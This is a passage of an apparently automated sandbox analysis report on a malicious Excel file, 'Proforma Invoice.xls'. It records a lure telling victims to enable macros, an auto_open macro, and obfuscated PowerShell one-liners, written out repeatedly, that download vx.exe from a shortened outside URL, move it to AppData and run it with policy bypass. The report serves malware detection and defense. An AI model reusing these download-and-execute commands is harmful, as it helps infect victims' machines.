Source: powershell.exe, 00000007.00000003.2109414271.000000001B886000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2124527603.000000001B888000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0Screenshot OCR: Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1Screenshot OCR: Enable Content"
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function auto_open, API Run("Auto_ouvrir51")Name: auto_open
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Proforma Invoice.xlsInitial sample: EXEC
Found obfuscated Excel 4.0 MacroShow sources
Source: Proforma Invoice.xlsInitial sample: High usage of CHAR() function: 37
Source: Proforma Invoice.xlsOLE, VBA macro line: Sub auto_open()
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function auto_openName: auto_open
Source: Proforma Invoice.xlsOLE indicator, VBA macros: true
Source: powershell.exe, 00000007.00000002.2124637558.000000001CCD0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal92.expl.evad.winXLS@13/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\ADEE0000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE55F.tmpJump to behavior
Source: Proforma Invoice.xlsOLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.........m.......F...............F.......A.....`IC........v.....................KJ.....................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............7..j....`.................6.............}..v............0.a...............X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......X...............6.............}..v............0.a.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............7..j....`.................6.............}..v............0.a...............X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......e.r.r.o.r. .o.c.c.u.r.r.e.d. .o.n. .a. .s.e.n.d..."."...........0.a.............h.X.....6.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............7..j......................6.............}..v....P.......0.a...............X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.6.6.............}..v....`.......0.a.............h.X.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............7..j......................6.............}..v............0.a...............X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j......X...............6.............}..v....`.......0.a.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............7..j......................6.............}..v............0.a...............X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......y./.Z.h.q.U.H.1.O.'.,.'.v.x...e.x.e.'.).........}..v............0.a.............h.X.....(.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............7..j....h.................6.............}..v............0.a...............X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......X...............6.............}..v............0.a.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............7..j....`.................6.............}..v............0.a...............X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j......X...............6.............}..v............0.a.....................f.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............7..j......................6.............}..v....P.......0.a...............X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......X...............6.............}..v............0.a.............h.X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0.a..................................... .........6.............}..v............ .................X.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.........m.......F...............F.......A.....`IC........v.....................KJ.....................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j......................6.............}..v....(.......0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......n.o.t. .e.x.i.s.t.................6.............}..v............0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j....p.................6.............}..v............0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.6.............}..v............0.a...............r.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......................6.............}..v....8 ......0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............M..j....0.r...............6.............}..v.....&......0.a.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j.....'................6.............}..v.....(......0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............M..j....0.r...............6.............}..v............0.a.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j...../................6.............}..v.....0......0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............M..j....0.r...............6.............}..v....85......0.a.....................\.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j.....5................6.............}..v....p6......0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............M..j....0.r...............6.............}..v....8=......0.a.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j.....=................6.............}..v....p>......0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .t.e.m.C.o.m.m.a.n.d.........6.............}..v.....B......0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j.....B................6.............}..v....HC......0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......M..j....0.r...............6.............}..v.....F......0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....G................6.............}..v.....H......0.a...............r.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.........m.......F...............F.......A.....`IC........v.....................KJ.....................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j.....A................6.............}..v.....B......0.a...............s.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............!..j......s...............6.............}..v.....H......0.a.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j.....I................6.............}..v.....J......0.a...............s.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;...............!..j......s...............6.............}..v....PO......0.a.....................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j.....P................6.............}..v.....P......0.a...............s.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.6.............}..v.....T......0.a.............x.s.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j....PU................6.............}..v.....U......0.a...............s.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............!..j......s...............6.............}..v.....[......0.a.....................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j.....[................6.............}..v....H\......0.a...............s.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............!..j......s...............6.............}..v.....c......0.a.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j.....c................6.............}..v....Hd......0.a...............s.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k....... . . .F.o.u.n.d.E.x.c.e.p.t.i.o.n.6.............}..v....Xh......0.a.............x.s.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j.....i................6.............}..v.....i......0.a...............s.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............!..j......s...............6.............}..v.....n......0.a.....................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j.....o................6.............}..v.....p......0.a...............s.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......!..j......s...............6.............}..v.....s......0.a.............x.s.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....Pt................6.............}..v.....t......0.a...............s.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Proforma Invoice.xlsVirustotal: Detection: 14%
Source: Proforma Invoice.xlsReversingLabs: Detection: 20%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: tomation.pdb source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdb1. source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb/\_ source: powershell.exe, 00000007.00000002.2118094681.0000000002A84000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdbi source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdbe source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2118121265.0000000002A87000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.2162138227.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2117783774.0000000002880000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2151607450.0000000002CE0000.00000002.00000001.sdmp, powershell.exe, 0000000B.00000002.2167391548.000000001B980000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_000007FF0027121C pushad ; ret 9_2_000007FF00271281
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
